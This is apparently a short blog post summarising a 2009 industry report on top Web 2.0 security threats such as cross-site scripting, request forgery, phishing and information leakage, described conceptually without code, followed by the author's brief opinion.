The Secure Enterprise 2.0 Forum has just released its 2009 industry report outlining the top Web 2.0 security threats. These security threats are not so much specific to Web 2.0 companies as much as they are to browser-based applications.
The list of key web 2.0 security threats:
- Cross Site Scripting (XSS): Malicious input is sent by an attacker, stored by a system, and then displayed to other users. Systems that allow users to input formatted content, such as HTML, are more susceptible to XSS and malicious scripts. This type of functionality in which many users can create content viewed by other users is typical to Web 2.0 systems such as social networks, blogs, or wikis, making Web 2.0 applications especially vulnerable to XSS. Web 2.0 applications rely heavily on user-generated input. In order to allow the user great control over the content design, applications often allow HTML tags that are not safe and can be abused for XSS.
- Cross Site Request Forgery/Cross Gadget Request Forgery: The victim visits a malicious Web site. While content is displayed on the victim's browser, the malicious site code generates requests to a different site to which the victim is authorized, for example through a persistent cookie. Such requests can perform operations on behalf of the victim, even across insecure gadgets on the same Web page.
- Phishing: The victim receives by e-mail a request to install a fraudulent widget, or is redirected to a fraudulent Web site in order to fill an online form with sensitive information.
- Information Leakage: Web 2.0 applications promote user-generated content and thus blur the line between work and private life. As a result, users may publish as part of their Web presence, information considered sensitive by their employer. Even if users are careful and do not leak information that is by itself sensitive, the aggregation of many small data items may be unacceptable.
- Information Integrity: Information correctness is one of the key elements of data security. While we usually think about loss of integrity due to a malicious hack, unintentional misinformation also leads to loss of integrity.
- Insufficient Anti-Automation: The programmatic interfaces exposed by Web 2.0 applications enable an attacker to automate attacks. Two examples of automation include brute force attacks and Cross Site Request Forgery. Other examples include automated retrieval of a large amount of information and automatic opening of accounts, for example as part of a phishing attack.
Personally, I think the biggest risk is information leakage. Despite any and all attempts to stop information from walking out the door, there is little that can actually be done. More about that in a future post.